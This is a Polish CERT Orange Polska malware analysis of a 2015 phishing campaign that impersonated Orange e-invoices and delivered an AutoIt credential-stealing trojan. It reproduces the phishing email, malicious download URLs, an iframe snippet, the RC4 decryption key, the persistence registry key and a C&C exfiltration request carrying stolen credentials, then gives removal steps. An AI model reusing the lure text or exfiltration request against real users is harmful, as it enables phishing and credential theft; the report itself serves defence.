Analiza kampanii złośliwego Oprogramowania efaktura Orange. Win32/Injector.Autoit.BKD / Trojan.VBInject



Podobne dokumenty
Orange Polska S.A. Bezpieczeństwo Systemów Teleinformatycznych / Wydział Operacji Bezpieczeństwa

Analiza możliwości złośliwego oprogramowania vjw0rm w kampanii phishingowej PayU

Analiza malware Keylogger ispy

H-Worm RAT. Analiza aktywności złośliwego oprogramowania. CERT Orange Polska S.A. Warszawa, dnia

Analiza aktywności złośliwego oprogramowania Njw0rm

Orange Polska S.A. Bezpieczeństwo Systemów Teleinformatycznych / Wydział Operacji Bezpieczeństwa

Analiza malware Remote Administration Tool (RAT) DarkComet

Trojan bankowy Emotet w wersji DGA

DESlock+ szybki start

Necurs analiza malware (1)

PROBLEMY TECHNICZNE. Co zrobić, gdy natrafię na problemy związane z użytkowaniem programu DYSONANS

Raport z analizy porównawczej rodzin ransomware JAFF i Cry

Spis treści

Analiza Trojana NotCompatible.C

Klient poczty elektronicznej - Thunderbird

Kurier DPD dla Subiekt GT

Krótka instrukcja instalacji Adobe Acrobat Reader

Tomasz Greszata - Koszalin

Norton 360 TM Instrukcja instalacji, aktywacji i dezinstalacji aplikacji

Instalacja wypychana ESET Endpoint Encryption

PORADNIK KORZYSTANIA Z SERWERA FTP ftp.architekturaibiznes.com.pl

Instrukcja pobrania i instalacji wersji testowej Invest for Excel

Złośliwe oprogramowanie Sandrorat (podszywające się pod oprogramowanie Kaspersky) na platformę Android WYNIKI ANALIZY

Zadanie 1 Treść zadania:

Certyfikat niekwalifikowany zaufany Certum Silver. Instalacja i użytkowanie pod Windows Vista. wersja 1.0 UNIZETO TECHNOLOGIES SA

Analiza aktywności złośliwego oprogramowania Orcus RAT

Pracownia internetowa w każdej szkole (edycja jesień 2005)

Internetowy System Zgłoszeń Postępowanie Kwalifikacyjne w Służbie Cywilnej PRZEWODNIK

Kurier DPD by CTI. Instrukcja

Shell Card Online usługa fakturowania elektronicznego Podręcznik użytkownika

Certyfikat Certum Basic ID. Instrukcja dla użytkowników Windows Vista. wersja 1.3 UNIZETO TECHNOLOGIES SA

E-faktura instrukcja dla kontrahentów TVP S.A.

Instrukcja dla użytkowników Windows Vista Certyfikat Certum Basic ID

PCBIZNES Instalacja wersji sieciowej na serwerze z Microsoft Windows 7

New Features in Allplan Allplan Nowy system licencjonowania w Allplan

Instrukcja instalacji programu STATISTICA

Autoryzacja zleceń z użyciem aplikacji Java Web Start "Pocztowy24Podpis"

KONFIGURACJA KONTA POCZTOWEGO DO POBRANIA WIADOMOŚCI Z OBECNEGO SERWERA POCZTOWEGO. Zespół Systemów Sieciowych

SPOSOBY DYSTRYBUCJI OPROGRAMOWANIA PANDA

Instrukcja wgrywania Certyfikatu Klienta do przeglądarki Mozilla Firefox. System Bankowości Internetowej KIRI BS 2012

elektroniczna Platforma Usług Administracji Publicznej

MasterEdytor. Podprogram pomocniczy do programu mpfotoalbum 1.2 INSTRUKCJA

Instrukcja aktualizacji programu FAKTURY i Rachunki 2013

ArtPlayer oprogramowanie do odtwarzania plików video sterowane Artnet/DMX V1.0.1

Adobe Connect Instalacja Adobe Flash Player

Certyfikat niekwalifikowany zaufany Certum Silver. Instrukcja dla uŝytkowników Windows Vista. wersja 1.1 UNIZETO TECHNOLOGIES SA

Pomoc dla r.

PROGRAMY NARZĘDZIOWE 1

BACKUP BAZ DANYCH FIREBIRD

Instrukcja instalacji aplikacji Comarch Smart Card ToolBox

Zadanie1: Odszukaj w serwisie internetowym Wikipedii informacje na temat protokołu http.

Włączanie/wyłączanie paska menu

V4R3. SEE Electrical Expert V4R3 Sposoby zabezpieczenia programu

Snifery wbudowane w Microsoft Windows

Dodawanie stron do zakładek

elektroniczna Platforma Usług Administracji Publicznej

Korzystanie z poczty i Internetu

Najważniejsze informacje dla klienta na temat Portalu Serwisowego D-Link Spis treści

SERWER AKTUALIZACJI UpServ

Fiery Remote Scan. Uruchamianie programu Fiery Remote Scan. Skrzynki pocztowe

Instrukcja składania wniosku o dofinansowanie w systemie informatycznym IP na potrzeby konkursu nr 1/1.1.2/2015

Użytkowniku programu FINKA, przekazujemy E-book, który omawia najważniejsze kwestie dotyczące generowania i wysyłania JPK.

Internetowy serwis Era mail Aplikacja sieci Web

Laboratorium - Przechwytywanie i badanie datagramów DNS w programie Wireshark

Fiery Remote Scan. Łączenie z serwerami Fiery servers. Łączenie z serwerem Fiery server przy pierwszym użyciu

Pracownia internetowa w każdej szkole (edycja Jesień 2007)

Archiwum DG 2016 PL-SOFT

Avigilon Control Center 6 Uaktualnienie oprogramowania

Instrukcja do programu Przypominacz 1.5

Logowanie do aplikacji TETA Web. Instrukcja Użytkownika

Instrukcja konfiguracji programu Fakt z modułem lanfakt

2014 Electronics For Imaging. Informacje zawarte w niniejszej publikacji podlegają postanowieniom opisanym w dokumencie Uwagi prawne dotyczącym tego

3S TeleCloud - Aplikacje Instrukcja użytkowania usługi 3S FAX SYSTEM

Instrukcja obsługi Outlook Web App i konfiguracji Thunderbird

Krótka instrukcja instalacji

Rozpoczęcie pracy z programem.

procertum CLIDE Client 2.1 wersja 1.0.2

Horde. Wojciech Myszka

Instrukcja do programu Do7ki 1.0

Raporty dodatkowe nr 2 Ewidencja Wyposażenia PL+

Bezpieczeństwo usług oraz informacje o certyfikatach

Zintegrowane Systemy Zarządzania Biblioteką SOWA1 i SOWA2 ZAMAWIANIE I REZERWOWANIE

Przed przystąpieniem do instalacji certyfikatów należy zweryfikować czy są spełnione poniższe wymagania systemowe.

Podstawy technologii WWW

Pokaz slajdów na stronie internetowej

1 IMAP czy POP3? 2 Instalacja programu Mozilla Thunderbird

SERWER AKTUALIZACJI UpServ

Krok 3 Pobranie certyfikatu kwalifikowanego

Kancelaria Prawna.WEB - POMOC

Poradnik instalacyjny sterownika CDC-ACM Dla systemów Windows

Pracownia internetowa w szkole ZASTOSOWANIA

Instrukcja konfiguracji programu Fakt z modułem lanfakt

Jak pobrać plan zajęć? wersja 1.0

Instrukcja pobrania i instalacji. certyfikatu niekwalifikowanego na komputerze lub karcie kryptograficznej. wersja 1.4 UNIZETO TECHNOLOGIES SA

Procedura zgłaszania problemów z obsługą oraz nieprawidłowości w funkcjonowaniu systemu PEFS 2007 w zakresie Programu Operacyjnego Kapitał Ludzki

Konfiguracja oprogramowania w systemach MS Windows dla kont z ograniczonymi uprawnieniami

Instrukcja pobrania i instalacji certyfikatu niekwalifikowanego na komputerze lub karcie. Instrukcja dla użytkowników. wersja 1.4

Books. by HansaWorld. Przewodnik instalacji. wersji 6.2

Laboratorium - Używanie programu Wireshark do obserwacji mechanizmu uzgodnienia trójetapowego TCP

Transkrypt:

Warszawa, dnia 5.10.2015 Analiza kampanii złośliwego Oprogramowania efaktura Orange Win32/Injector.Autoit.BKD / Trojan.VBInject CERT OPL Analiza Malware Autor: Iwo Graj Strona 1 z 20

Spis Treści. 1. Wstęp...3 2. Analiza Statyczna...7 4. Rekomendacje...21 CERT OPL Analiza Malware Autor: Iwo Graj Strona 2 z 20

Kampania szkodliwego oprogramowania Win32/Injector.Autoit.BKD / Win32/PSW.VB.NIS 1. Wstęp. Znaczna liczba polskich internautów w tym klienci Orange Polska otrzymała w piątek 2 października 2015 na swoje skrzynki e-mail dziwnie wyglądające wiadomości, sugerujące, iż mają do czynienia z zaległą fakturę Orange. Wiadomość wyglądała następująco: Witamy, Przypominamy, ze uplynal termin platnosci e-faktury za uslugi stacjonarne Orange. Zaleglosci z tytulu nieuregulowanych oplat dotycza: Numer faktury FWL9059917000115 Numer ewidencyjny Klienta 541 290 5991 7053 Kwota do zaplaty 107,15 PLN Termin platnosci 2015-08-20 Szczególowe rozliczenie kwoty do zaplaty faktury jest dostepne pod linkiem. Wygodnie i zawsze w terminie e-fakture mozna oplacic korzystajac z Polecenia Zaplaty lub Platnosci Elektronicznej. Jezeli faktura zostala juz oplacona prosimy o uznanie tej wiadomosci za nieaktualna. Wiadomosc zostala wygenerowana automatycznie, prosimy na nia nie odpowiadac. Pozdrawiamy Orange Pod linkiem w wiadomości znajdowały się dwa różne adresy internetowe stron www: http://orange.dokumenty.co.vu/wyswietl-fakture/fwl90599170-001-15.pdf http://dokumenty.orange-24.pl/view-online/i.html?wyswietl-fakture=fwl90599170/001/15.pdf CERT OPL Analiza Malware Autor: Iwo Graj Strona 3 z 20

Wieczorem 2 października została założona kolejna domena na którą został przekierowany ruch z adresu http://orange.dokumenty.co.vu/ na http://dokumenty-orange.5v.pl Po kliknięciu w link, otwierała się kolejna witryna, na której znajdował się animowany plik gif imitujący otwierający się w przeglądarce internetowej dokument Adobe Reader. Następnie użytkownikowi wyświetlał się plik do pobrania o nazwie FWL9059917000115.scr CERT OPL Analiza Malware Autor: Iwo Graj Strona 4 z 20

Poniżej plik z rozszerzeniem.gif, który wyświetlał się użytkownikowi. Pobierany plik był rozpoznawalny przez 32 na 56 silników antywirusowych. Świadczy to o tym, że autorzy tej kampanii wykorzystali gotowy skrypt, który w prawie niezmienionej postaci został wykorzystany w kampanii. Nie zostały użyte zaawansowane techniki zaciemniania kodu, triki utrudniające analizę, czy też protektory, wykrywające maszyny wirtualne. CERT OPL Analiza Malware Autor: Iwo Graj Strona 5 z 20

Oto kod źródłowy strony, która wyświetlała się użytkownikowi: Jak widać w powyższym kodzie, na stronie umieszczona była ramka importująca zawartość z docelowej strony http://wrzos.net/pl1/index.html, skąd pobierany był kod: <div id="iframe_cont"> <iframe style="position:absolute; top:0px; left:0px;z-index:1;" src="http://wrzos.net/pl1/index.html" width="100%" height="100%" frameborder="0" scrolling="auto" id="frame_c"></iframe> </div> <noframes> <div style="text-align: center;"> <b>witamy. System wykrył, że twoja przeglądarka nie obsługuje ramek.</b><br /> <h1> <a href="http://wrzos.net/pl1/index.html"></a></h1> <p>darmowe aliasy <a href="http://5v.pl">5v.pl</a> </p></div> </noframes> Na docelowej stronie znajdował się prosty skrypt JavaScript, który rozpoczynał pobieranie ze strony http://wrzos.net/pl1/index.html" CERT OPL Analiza Malware Autor: Iwo Graj Strona 6 z 20

2. Analiza kodu Zdebugowanie pliku o nazwie FWL9059917000115.scr pozwoliło na dalszą analizę złośliwego kodu. Podczas analizy zostały przedstawione fragmenty, które kluczowo odpowiadają za infekowanie systemu użytkownika oraz jego złośliwe działanie. Po zdekompilowaniu sekcji kodu można zobaczyć zastosowane triki, których zadaniem jest utrudnienie czytania kodu: Po oczyszczeniu kodu z zakodowanych znaków CharCode'u kod wyglądał zdecydowanie bardziej przejrzyście: Jak widać po pierwszych liniach kodu, skrypt tworzył w lokalizacjach @TempDir oraz @AppData użytkownika systemu dwa pliki: xd oraz plik wykonywalny o losowej nazwie wygenerowanej przez użytą funkcję Random. CERT OPL Analiza Malware Autor: Iwo Graj Strona 7 z 20

Lokalizacja plików w systemie Windows po infekcji: Plik o wygenerowanej losowo nazwie 34162.exe Zawartość tego pliku była kopią zawartości pliku pobieranego ze strony utworzonej przez spamerów. Funkcjonowanie tego skryptu miało zapewnić uruchamianie się docelowego pliku z wirusem przy każdym starcie systemu użytkownika. Był on generowany za pomocą pliku 34162.exe, posiadającego funkcję samorozpakowania. W pierwszej kolejności sprawdzał on, czy plik xd z docelowym wirusem istnieje już w systemie w danej lokalizacji. Jeśli nie, tworzył go ponownie, a następnie uruchamiał. Tego typu pętla miała zapewnić ciągłość infekcji komputera użytkownika. CERT OPL Analiza Malware Autor: Iwo Graj Strona 8 z 20

Wygenerowany plik z działającym wirusem znajdował się w następującej lokalizacji systemu Windows: Ciekawym pomysłem było również zastosowanie w kodzie triku z wykorzystaniem ADS (Alternate Data Streams). Jest to jedna ze standardowych właściwości systemu plików NTFS. W wielu przypadkach jest ona wykorzystywana przez twórców złośliwego oprogramowania do ukrywania danych w systemach plików NTFS. To częste zachowanie różnego typu rootkitów lub innego złośliwego oprogramowania. CERT OPL Analiza Malware Autor: Iwo Graj Strona 9 z 20

Poniżej przedstawiono fragment kodu dodający ADS do generowanego pliku z wartością :Zone.Identifier:$DATA Jednocześnie po pobraniu pliku FWL9059917000115.scr ze złośliwym oprogramowaniem za pomocą polecenia dir i przełącznika /r można zobaczyć jakie wartości ma w sobie ADS. CERT OPL Analiza Malware Autor: Iwo Graj Strona 10 z 20

Kolejną złośliwą funkcją było dopisanie do rejestru systemu użytkownika wpisu i podklucza, który miał uruchamiać wirusa lub ponownie wygenerować docelowy plik xd. Zaciemniony kod wirusa dopisujący wpis do rejestru: Kod po usunięciu zakodowanych znaków CharCode: Jak widać, wirus dopisywał za pomocą funkcji RegWrite do rejestru w lokalizacji HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run podklucz o nazwie WerFault oraz lokalizację pliku wykonywalnego wraz z jego nazwą wygenerowaną dynamicznie przez funkcję Random. Efekty infekcji zostały przedstawione na poniższym zrzucie ekranu. CERT OPL Analiza Malware Autor: Iwo Graj Strona 11 z 20

Wirus zainfekował system, dopisując podklucz do rejestru, a także zapisał ścieżkę do pliku wykonywalnego o nazwie 34162.exe w celu uruchamiania go przy każdym starcie zainfekowanego systemu. Lokalizacja pliku wykonywalnego 34162.exe to w tym przypadku C:\Users\Iwo Graj\AppData\Roaming CERT OPL Analiza Malware Autor: Iwo Graj Strona 12 z 20

Kolejną ciekawą rzeczą w kodzie jest użycie algorytmu RC4, który dekoduje całą zawartość pliku o nazwie xd znajdującego się w lokalizacji C:\Users\Iwo Graj\AppData\Local\Temp\. Kod źródłowy odpowiedzialny za odczytanie i zdeszyfrowanie pliku xd przedstawiono poniżej. Jak widać, klucz za pomocą którego można zdeszyfrować plik to ATug1WeGggHWUpmY2qyjve Poniżej przedstawiono Zaciemniony kod funkcji _rc4, która określa zawartość zmiennej $de, używanej w dalszej kolejności do realizacji złośliwych funkcji. CERT OPL Analiza Malware Autor: Iwo Graj Strona 13 z 20

Kod funkcji po usunięciu zakodowanych znaków CharCode: Kolejna zaciemniona CharCode'em zdefiniowana funkcja _get_rc4_opcode: Oraz po usunięciu zaciemnienia CharCode: CERT OPL Analiza Malware Autor: Iwo Graj Strona 14 z 20

Zmienna Opcode zawiera kod assemblera, który jest następnie wykonywany. Poniższe zrzuty przedstawiają omawiany deasemblowany kod Opcode : CERT OPL Analiza Malware Autor: Iwo Graj Strona 15 z 20

CERT OPL Analiza Malware Autor: Iwo Graj Strona 16 z 20

Poniżej przedstawiono pozostały zbiór zdefiniowanych przez autora funkcji użytych w kodzie. CERT OPL Analiza Malware Autor: Iwo Graj Strona 17 z 20

Po zdekodowaniu pliku xd za pomocą klucza RC4 znajdującego się w pliku z fakturą, przeprowadzono analizę wykonywalnego pliku binarnego, odpowiedzialnego za złośliwe funkcje - wykradanie loginów i haseł z przeglądarek internetowych. Na poniższym zrzucie ekranu przedstawiono program zatrzymany w momencie wysyłania skradzionych danych do serwera C&C. CERT OPL Analiza Malware Autor: Iwo Graj Strona 18 z 20

Na potrzeby analizy został utworzony użytkownik i hasło oraz konto pocztowe. Przekazywanie wykradzionych danych przez malware z zainfekowanego komputera na serwer, wykonywane jest za pomocą następujących żądań HTTP: http://update-microsoft.pl/wpconfig/isr/api/index.php?action=add&username=marcin.kozlowski007@o2.pl&password=&app=i E%207-9&pcname=CERT-ORANGE&sitename=http://poczta.o2.pl/ CERT OPL Analiza Malware Autor: Iwo Graj Strona 19 z 20

3. Rekomendacje Jak usunąć tego wirusa? - uruchom system w trybie awaryjnym w menu start w oknie Wyszukaj programy i pliki wpisz Regedit i uruchom znaleziony plik regedit.exe - naciśnij Ctrl-F, w oknie wyszukiwania wpisz WerFault podklucz znajduje się w lokalizacji HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run po czym usuń znaleziony podklucz w nazwie WerFault odwołujący się do lokalizacji pliku wykonywalnego C:\[Nazwa_użytkownika]\AppData\Roaming\[nazwa_pliku.exe] - następnie otwórz lokalizację C:\Użytkownicy\[Nazwa_użytkownika]\AppData\Roaming\, odszukaj plik wykonywalny ****.exe występujący w podkluczu i usuń go - następnie otwórz lokalizację C:\Użytkownicy\[Nazwa_użutkownika]\AppData\Local\Temp\ odszukaj plik o nazwie xd i usuń go. Zalecamy również stosowanie oprogramowania antywirusowego, które może przyczynić się do uniknięcia kolejnych infekcji rożnego rodzaju złośliwym oprogramowaniem. CERT OPL Analiza Malware Autor: Iwo Graj Strona 20 z 20